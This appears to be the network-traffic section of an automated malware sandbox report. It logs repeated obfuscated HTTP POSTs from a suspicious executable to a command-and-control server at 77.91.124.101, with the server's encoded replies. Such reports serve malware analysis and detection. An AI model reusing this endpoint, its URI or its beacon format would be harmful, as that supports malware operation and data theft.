                                                            Data Ascii: WQ]\[^Z_]WUWU[WRP[XAV_WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X);*=+>/B&4*+30[%0,+<<<,&G''^)3
                                                            Nov 21, 2023 04:48:21.366157055 CET493INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8177.91.124.10180192.168.2.549796C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:20.957691908 CET490OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.155589104 CET490INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.155800104 CET492OUTData Raw: 57 51 5d 5c 5b 5e 5a 5f 5d 57 55 57 55 5b 57 52 50 5b 58 41 56 5f 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQ]\[^Z_]WUWU[WRP[XAV_WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X);*=+>/B&4*+30[%0,+<<<,&G''^)3
                                                            Nov 21, 2023 04:48:21.366157055 CET493INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8277.91.124.10180192.168.2.549797C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:21.689570904 CET493OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.886193037 CET494INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.886437893 CET496OUTData Raw: 57 5b 5d 5c 5b 5f 5a 50 5d 57 55 57 55 5f 57 51 50 59 58 43 56 57 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]\[_ZP]WUWU_WQPYXCVWWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)*(R?#(8.\ )!]<0!$!3 )-5<,$,&G''^)#
                                                            Nov 21, 2023 04:48:22.088074923 CET497INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            82192.168.2.54979777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:21.689570904 CET493OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.886193037 CET494INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.886437893 CET496OUTData Raw: 57 5b 5d 5c 5b 5f 5a 50 5d 57 55 57 55 5f 57 51 50 59 58 43 56 57 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]\[_ZP]WUWU_WQPYXCVWWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)*(R?#(8.\ )!]<0!$!3 )-5<,$,&G''^)#
                                                            Nov 21, 2023 04:48:22.088074923 CET497INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            83192.168.2.54979877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.411200047 CET498OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:22.609960079 CET498INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:22.791090012 CET499INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8377.91.124.10180192.168.2.549798C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.411200047 CET498OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:22.609960079 CET498INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:22.791090012 CET499INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8477.91.124.10180192.168.2.549799C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.787108898 CET498OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:22.984966040 CET500INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:22.988972902 CET501OUTData Raw: 52 5d 5d 5e 5b 59 5a 5d 5d 57 55 57 55 5e 57 53 50 52 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]^[YZ]]WUWU^WSPRX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%<>#;].$\4\&) 6V3=-$>:6\+$;&G''^)
                                                            Nov 21, 2023 04:48:23.191557884 CET504INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 32 3c 2f 04 37 33 0d 57 3f 04 07 50 2c 3e 3d 19 2a 23 2e 03 27 3d 3c 59 33 07 25 19 2b 11 0e 1f 25 3a 28 13 21 35 33 03 2a 1a 21 5a 0c 1d 25 06 36 16 2f 52 2b 10 2b 05 3c 2d 2f 06 27 31 09 14 2b 2d 23 55 34 33 33 5b 25 23 19 0e 2c 11 3e 03 3a 3b 2e 08 25 3f 22 58 20 2d 23 5f 0c 14 27 53 36 31 2b 59 20 56 2d 0e 36 09 3c 5f 20 24 37 56 26 2d 27 09 26 06 0f 17 3c 01 3b 0c 26 34 23 0d 27 2a 3c 0e 25 5f 2f 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "2</73W?P,>=*#.'=<Y3%+%:(!53*!Z%6/R++<-/'1+-#U433[%#,>:;.%?"X -#_'S61+Y V-6<_ $7V&-'&<;&4#'*<%_/Q<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            84192.168.2.54979977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.787108898 CET498OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:22.984966040 CET500INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:22.988972902 CET501OUTData Raw: 52 5d 5d 5e 5b 59 5a 5d 5d 57 55 57 55 5e 57 53 50 52 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]^[YZ]]WUWU^WSPRX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%<>#;].$\4\&) 6V3=-$>:6\+$;&G''^)
                                                            Nov 21, 2023 04:48:23.191557884 CET504INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 32 3c 2f 04 37 33 0d 57 3f 04 07 50 2c 3e 3d 19 2a 23 2e 03 27 3d 3c 59 33 07 25 19 2b 11 0e 1f 25 3a 28 13 21 35 33 03 2a 1a 21 5a 0c 1d 25 06 36 16 2f 52 2b 10 2b 05 3c 2d 2f 06 27 31 09 14 2b 2d 23 55 34 33 33 5b 25 23 19 0e 2c 11 3e 03 3a 3b 2e 08 25 3f 22 58 20 2d 23 5f 0c 14 27 53 36 31 2b 59 20 56 2d 0e 36 09 3c 5f 20 24 37 56 26 2d 27 09 26 06 0f 17 3c 01 3b 0c 26 34 23 0d 27 2a 3c 0e 25 5f 2f 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "2</73W?P,>=*#.'=<Y3%+%:(!53*!Z%6/R++<-/'1+-#U433[%#,>:;.%?"X -#_'S61+Y V-6<_ $7V&-'&<;&4#'*<%_/Q<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            85192.168.2.54980077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.909718037 CET500OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:23.108768940 CET501INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:23.108985901 CET504OUTData Raw: 52 5b 5d 59 5b 5e 5a 50 5d 57 55 57 55 5a 57 5b 50 5b 58 40 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Y[^ZP]WUWUZW[P[X@VVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=-X((==,:] >(:3!'3!.86<']8.&G''^)7
                                                            Nov 21, 2023 04:48:23.312886953 CET505INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8577.91.124.10180192.168.2.549800C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:22.909718037 CET500OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:23.108768940 CET501INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:23.108985901 CET504OUTData Raw: 52 5b 5d 59 5b 5e 5a 50 5d 57 55 57 55 5a 57 5b 50 5b 58 40 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Y[^ZP]WUWUZW[P[X@VVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=-X((==,:] >(:3!'3!.86<']8.&G''^)7
                                                            Nov 21, 2023 04:48:23.312886953 CET505INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:22 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            86192.168.2.54980177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:23.625998974 CET505OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:23.822474003 CET506INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:23.822760105 CET508OUTData Raw: 57 58 58 50 5b 53 5a 50 5d 57 55 57 55 5b 57 57 50 5d 58 40 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXXP[SZP]WUWU[WWP]X@VPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(1(1* 8;'9":*+ "W'=2W$#-9++<_;&G''^)3
                                                            Nov 21, 2023 04:48:24.026417971 CET509INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:23 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8677.91.124.10180192.168.2.549801C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:23.625998974 CET505OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:23.822474003 CET506INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:23.822760105 CET508OUTData Raw: 57 58 58 50 5b 53 5a 50 5d 57 55 57 55 5b 57 57 50 5d 58 40 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXXP[SZP]WUWU[WWP]X@VPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(1(1* 8;'9":*+ "W'=2W$#-9++<_;&G''^)3
                                                            Nov 21, 2023 04:48:24.026417971 CET509INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:23 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8777.91.124.10180192.168.2.549802C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:24.347886086 CET509OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:24.546761036 CET509INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:24.546966076 CET512OUTData Raw: 52 5a 58 5a 5e 5f 5a 50 5d 57 55 57 55 56 57 57 50 5b 58 46 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXZ^_ZP]WUWUVWWP[XFVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*+5?+2T>0$,% )X) "'="V$01:;<,'Y/.&G''^)
                                                            Nov 21, 2023 04:48:24.749294043 CET512INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:24 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            87192.168.2.54980277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:24.347886086 CET509OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:24.546761036 CET509INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:24.546966076 CET512OUTData Raw: 52 5a 58 5a 5e 5f 5a 50 5d 57 55 57 55 56 57 57 50 5b 58 46 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXZ^_ZP]WUWUVWWP[XFVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*+5?+2T>0$,% )X) "'="V$01:;<,'Y/.&G''^)
                                                            Nov 21, 2023 04:48:24.749294043 CET512INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:24 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8877.91.124.10180192.168.2.549803C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
